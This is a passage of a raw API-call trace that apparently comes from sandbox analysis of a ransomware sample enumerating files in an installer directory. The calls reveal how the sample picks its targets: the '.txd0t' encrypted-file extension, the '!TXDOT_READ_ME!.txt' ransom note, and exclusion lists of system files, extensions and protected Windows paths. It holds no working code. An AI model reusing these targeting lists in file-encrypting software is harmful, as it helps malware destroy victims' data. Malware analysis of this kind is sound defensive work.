lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0071.575] StrCmpW (psz1=".", psz2=".") returned 0 [0071.575] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.575] StrCmpW (psz1="..", psz2=".") returned 1 [0071.575] StrCmpW (psz1="..", psz2="..") returned 0 [0071.575] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.575] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.575] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.575] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0071.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0071.575] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned="C:\\588bce7c90097ed212\\3082\\eula.rtf" [0071.575] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.575] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.575] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.575] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.575] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.575] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.576] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.576] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.576] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.576] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.576] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.576] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.576] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.576] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.576] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0071.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0071.576] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" [0071.576] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.576] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.576] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.576] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.576] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.576] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.576] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.576] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.576] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.577] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.577] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.577] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.577] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.577] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.577] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0071.577] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0071.577] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" [0071.577] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.577] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.577] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.577] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.577] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.577] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.577] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0071.577] GetProcessHeap () returned 0xe30000 [0071.577] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.577] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0071.577] StrCmpW (psz1="Client", psz2=".") returned 1 [0071.578] StrCmpW (psz1="Client", psz2="..") returned 1 [0071.578] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.578] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.578] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Client", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system32\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\local\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\boot\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\perflogs\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\programdata\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\drivers\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\wsus\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="crypt_detect") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="cryptolocker") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="ransomware") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\WINDOWS") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.578] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files") returned 0x0 [0071.578] GetProcessHeap () returned 0xe30000 [0071.578] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0xecab68 [0071.578] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0071.578] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\*", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\*") returned="C:\\588bce7c90097ed212\\Client\\*" [0071.578] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2530 [0071.579] StrCmpW (psz1=".", psz2=".") returned 0 [0071.579] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.579] StrCmpW (psz1="..", psz2=".") returned 1 [0071.579] StrCmpW (psz1="..", psz2="..") returned 0 [0071.579] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0071.579] StrCmpW (psz1="Parameterinfo.xml", psz2=".") returned 1 [0071.579] StrCmpW (psz1="Parameterinfo.xml", psz2="..") returned 1 [0071.579] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0071.579] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0071.579] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="Parameterinfo.xml", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned="C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" [0071.579] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0071.580] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootsect.bak") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="iconcache.db") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="thumbs.db") returned -1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransomware ") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2=" ransom ") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="debug.txt") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="boot.ini") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="desktop.ini") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="autorun.inf") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntuser.dat") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntldr") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="ntdetect.com") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="bootfont.bin") returned 1 [0071.580] StrCmpIW (psz1="Parameterinfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.580] PathFindExtensionW (pszPath="Parameterinfo.xml") returned=".xml" [0071.580] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.580] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.580] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.580] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.580] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.580] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.580] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.580] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x6c0e48, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0071.580] StrCmpW (psz1="UiInfo.xml", psz2=".") returned 1 [0071.580] StrCmpW (psz1="UiInfo.xml", psz2="..") returned 1 [0071.580] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Client", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0071.580] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client", psz2="\\", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\") returned="C:\\588bce7c90097ed212\\Client\\" [0071.580] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Client\\", psz2="UiInfo.xml", cchMax=1082 | out: psz1="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" [0071.580] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0071.580] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.580] StrCmpIW (psz1="UiInfo.xml", psz2="bootsect.bak") returned 1 [0071.580] StrCmpIW (psz1="UiInfo.xml", psz2="iconcache.db") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="thumbs.db") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2=" ransomware ") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2=" ransom ") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="debug.txt") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="boot.ini") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="desktop.ini") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="autorun.inf") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="ntuser.dat") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="ntldr") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="ntdetect.com") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="bootfont.bin") returned 1 [0071.581] StrCmpIW (psz1="UiInfo.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.581] PathFindExtensionW (pszPath="UiInfo.xml") returned=".xml" [0071.581] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.581] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.581] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.581] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.582] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.582] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.582] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.582] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, 